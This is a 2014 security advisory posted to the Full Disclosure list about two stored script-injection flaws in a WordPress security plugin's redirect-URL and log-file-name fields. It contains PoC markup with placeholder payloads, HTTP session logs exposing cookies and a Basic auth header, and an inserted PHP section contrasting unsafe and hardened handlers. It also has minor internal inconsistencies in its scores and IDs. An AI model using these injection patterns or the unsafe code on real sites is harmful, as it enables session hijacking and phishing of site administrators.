List: full-disclosure
Subject: [FD] All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-09-30 14:39:46
Message-ID: 542AC0B2.6020403 () vulnerability-lab ! com
Document Title:
===============
All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325
Release Date:
=============
2014-09-29
Vulnerability Laboratory ID (VL-ID):
====================================
1327
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a security plugin that enforces a lot of good security practices. The All In One WordPress Security plugin will take your website security to a whole new level. This plugin is designed and written by experts and is easy to use and understand. It reduces security risk by checking for vulnerabilities, and by implementing and enforcing the latest recommended WordPress security practices and techniques.
(Copy of the Vendor Homepage: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered two persistent vulnerabilities in the official All in One Security & Firewall v3.8.3 Wordpress Plugin.
Vulnerability Disclosure Timeline:
==================================
2014-09-29: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Github
Product: All In One Security & Firewall - Wordpress Plugin 3.8.3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Two persistent POST injection web vulnerabilities have been discovered in the official All in One WP Security and Firewall v3.8.3 plugin. The vulnerabilities allow remote attackers to inject their own malicious script code into the application side of the vulnerable service.
The first vulnerability is located in the 404 detection redirect URL input field of the firewall's 404 detection module. Remote attackers are able to prepare malicious requests that inject their own script code into the application side of the vulnerable service. The injection request method is POST, and the attack vector executes on the application side (persistent). The attacker injects script code into the 404 detection redirect URL input field; execution occurs in the same section, next to the input field whose stored value is displayed again.
The second vulnerability is located in the error log file name input field of the FileSystem Components > Host System Logs module. Remote attackers are able to prepare malicious requests that inject their own script code into the application side of the vulnerable service. The injection request method is POST, and the attack vector executes on the application side (persistent). The attacker injects script code into the error log file name input field; execution occurs in the same section, next to the input field whose stored value is displayed again.
The security risk of the persistent POST injection vulnerabilities is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.2. Exploitation of the application-side web vulnerability requires no privileged web-application user account but low or medium user interaction. Successful exploitation results in persistent phishing attacks, session hijacking, persistent external redirects to malicious sources and application-side manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Firewall - Detection 404
[+] FileSystem Components > Host System
Vulnerable Parameter(s):
[+] 404 detection redirect url
[+] file name error logs url
Affected Module(s):
[+] Firewall - Detection 404
[+] FileSystem Components > Host System
Proof of Concept (PoC):
=======================
1.1
The first POST injection web vulnerability can be exploited by remote attackers without a privileged application user account and with low or medium user interaction. To demonstrate or reproduce the vulnerability, follow the information and steps below.
PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] )
<tr valign="top">
<th scope="row">404 Lockout Redirect URL:</th>
<td><input size="50" name="aiowps_404_lock_redirect_url" value="http://127.0.0.1\" type="text"><\"<img src="\"x\"">%20%20>\"<%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]>" />
<span class="description">A blocked visitor will be automatically redirected to this URL.</span> </td>
</tr>
</table>
<input type="submit" name="aiowps_save_404_detect_options" value="Save Settings" class="button-primary" />
</form>
</div></div>
<div class="postbox">
<h3><label for="title">404 Event Logs</label></h3>
<div class="inside">
<form id="tables-filter" method="post">
<!-- For plugins, we also need to ensure that the form posts back to our current page --> <input type="hidden" name="page" value="aiowpsec_firewall" />
<input type="hidden" name="tab" value="tab6" /> <!-- Now we can render the completed list table -->
<input type="hidden" id="_wpnonce" name="_wpnonce" value="054474276c" /><input type="hidden" name="_wp_http_referer" value="/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6" /> <div class="tablenav top">
<div class="alignleft actions">
<select name='action'>
<option value='-1' selected='selected'>Bulk Actions</option>
<option value='delete'>Delete</option>
</select>
<input type="submit" name="" id="doaction" class="button action" value="Apply" onClick="return confirm("Are you sure you want to perform this bulk operation on the selected entries?")" /> </div> <div class='tablenav-pages no-pages'><span class="displaying-num">0 items</span>
<span class='pagination-links'><a class='first-page disabled' title='Go to the first page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6'> «</a> <a class='prev-page disabled' title='Go to the previous page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=1'>‹</a>
<span class="paging-input"><input class='current-page' title='Current page' type='text' name='paged' value='1' size='1' /> of <span class='total-pages'>0</span></span> <a class='next-page' title='Go to the next page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>›</a>
<a class='last-page' title='Go to the last page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'> »</a></span></div> <br class="clear" />
</div>
--- PoC Session Logs [POST] (Firewall > 404 Detection) ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8095] Mime Type[text/html] Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; \
wordpress_test_cookie=WP+Cookie+check; \
wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; \
wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26 \
m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; \
wp-settings-time-1=1411750846] Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:40:21 GMT]
Content-Type[text/html; charset=UTF-8]
Content-Length[8095]
Connection[keep-alive]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Vary[Accept-Encoding]
Content-Encoding[gzip]
-
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!] Load Flags[LOAD_NORMAL] Größe des Inhalts[557] Mime Type[text/html] Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; \
wordpress_test_cookie=WP+Cookie+check; \
wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; \
wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26 \
m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; \
wp-settings-time-1=1411750846] Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:40:22 GMT]
Content-Type[text/html]
Content-Length[557]
Connection[keep-alive]
Last-Modified[Tue, 14 May 2013 13:05:17 GMT]
Etag["4ea065b-3c6-4dcad48e5901e"]
Accept-Ranges[bytes]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Powered-By[PleskLin]
Reference(s):
/wp-admin/admin.php?page=aiowpsec_firewall
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6
/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0
1.2
The second POST injection web vulnerability can be exploited by remote attackers without a privileged application user account and with low or medium user interaction. To demonstrate or reproduce the vulnerability, follow the information and steps below.
PoC: FileSystem Components > Host System Logs
<div class="inside">
<p>Please click the button below to view the latest system logs:</p>
<form action="" method="POST">
<input id="_wpnonce" name="_wpnonce" value="92d4aba49c" type="hidden">
<input name="_wp_http_referer" value="/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4" type="hidden"> <div>Enter System Log File Name:
<input size="25" name="aiowps_system_log_file" value="error_log>\\>\"[PERSISTENT INJECTED SCRIPT CODE!] type="text">" />
<span class="description">Enter your system log file name. (Defaults to error_log)</span> </div>
<div class="aio_spacer_15"></div>
<input name="aiowps_search_error_files" value="View Latest System Logs" class="button-primary search-error-files" type="submit"> <span style="display: none;" class="aiowps_loading_1">
<img src="http://www.vulnerability-db.com/dev/wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif" alt=""> </span>
</form>
</div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin-ajax.php Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json] Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
Content-Length[109]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; \
wordpress_test_cookie=WP+Cookie+check; \
wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; \
wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26 \
m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; \
wp-settings-time-1=1411750846] Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
interval[60]
_nonce[176fea481c]
action[heartbeat]
screen_id[wp-security_page_aiowpsec_filesystem]
has_focus[false]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:53:44 GMT]
Content-Type[application/json; charset=UTF-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
X-Robots-Tag[noindex]
x-content-type-options[nosniff]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[6136] Mime Type[text/html] Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; \
wordpress_test_cookie=WP+Cookie+check; \
wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; \
wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26 \
m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; \
wp-settings-time-1=1411750846] Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:53:54 GMT]
Content-Type[text/html; charset=UTF-8]
Content-Length[6136]
Connection[keep-alive]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Reference(s):
/wp-admin/admin-ajax.php
/wp-admin/admin.php?page=aiowpsec_filesystem
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
/wp-content/plugins/all-in-one-wp-security-and-firewall/
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
Solution - Fix & Patch:
=======================
The log file name issue can be patched by securely parsing the Enter System Log File Name input context in the file system security module. The 404 Lockout Redirect URL issue can be patched by securely encoding and parsing that input context in the firewall 404 detection module. Restrict the input and handle malicious context with your own secure exception handling to prevent further POST injection attacks.
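The following is an added example, not code from the plugin or from this advisory: an illustrative WordPress save/render handler for the two parameters named above (aiowps_404_lock_redirect_url and aiowps_system_log_file), showing the unsafe store-and-echo pattern beside a hardened one. The function names, the option keys and the nonce action are assumptions for the demo; the WordPress helpers used (wp_unslash, esc_url_raw, esc_attr, sanitize_file_name, check_admin_referer, get_option, update_option) are real core functions.

```php
<?php
// Added example (not the plugin's own code). Demonstrates why the stored value
// must be validated on input AND escaped on output for the two fields in the
// advisory. Option keys and function names are assumptions for this demo.

// UNSAFE: raw POST value is stored and later echoed into value="" unescaped.
// A stored value containing " and > breaks out of the attribute, so the
// injected markup is rendered every time the settings page is displayed.
// (WordPress also adds slashes to $_POST, which is why the PoC shows \" in the
// echoed value: the slashed string was stored and printed back verbatim.)
function aiowps_demo_save_404_redirect_unsafe() {
    update_option( 'aiowps_404_lock_redirect_url', $_POST['aiowps_404_lock_redirect_url'] );
}
function aiowps_demo_render_404_redirect_unsafe() {
    $url = get_option( 'aiowps_404_lock_redirect_url' );
    echo '<input size="50" name="aiowps_404_lock_redirect_url" value="' . $url . '" type="text" />';
}

// HARDENED: check the form nonce, strip WordPress's added slashes, keep only a
// plain http(s) URL, and escape on output. Input validation limits what can be
// stored; output escaping guarantees the value cannot leave the attribute.
function aiowps_demo_save_404_redirect_safe() {
    check_admin_referer( 'aiowps-demo-save-404-settings' ); // nonce action is an assumption
    $raw = isset( $_POST['aiowps_404_lock_redirect_url'] ) ? wp_unslash( $_POST['aiowps_404_lock_redirect_url'] ) : '';
    $url = esc_url_raw( trim( $raw ), array( 'http', 'https' ) );
    if ( '' === $url ) {
        return false; // reject anything that is not a plain http(s) URL
    }
    update_option( 'aiowps_404_lock_redirect_url', $url );
    return true;
}
function aiowps_demo_render_404_redirect_safe() {
    $url = get_option( 'aiowps_404_lock_redirect_url', '' );
    echo '<input size="50" name="aiowps_404_lock_redirect_url" value="' . esc_attr( $url ) . '" type="text" />';
}

// HARDENED: the system log file name must be a bare file name such as
// "error_log", never a path or markup, and must be escaped when echoed back.
function aiowps_demo_sanitize_log_file_name( $raw ) {
    $name = sanitize_file_name( wp_unslash( $raw ) );
    // sanitize_file_name already drops quotes, <, > and slashes; additionally
    // refuse anything that is not a simple basename made of safe characters.
    if ( '' === $name || $name !== basename( $name ) || ! preg_match( '/^[A-Za-z0-9_.-]+$/', $name ) ) {
        return 'error_log'; // fall back to the documented default
    }
    return $name;
}
function aiowps_demo_render_log_file_name( $name ) {
    echo '<input size="25" name="aiowps_system_log_file" value="' . esc_attr( $name ) . '" type="text" />';
}
```

With the hardened handlers, the payload shown in the PoC is either rejected on save (not a plain URL, not a bare file name) or, if it ever reaches the option table, is rendered as inert text inside the attribute.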
Security Risk:
==============
The security risk of the POST injection web vulnerabilities in the firewall module is estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/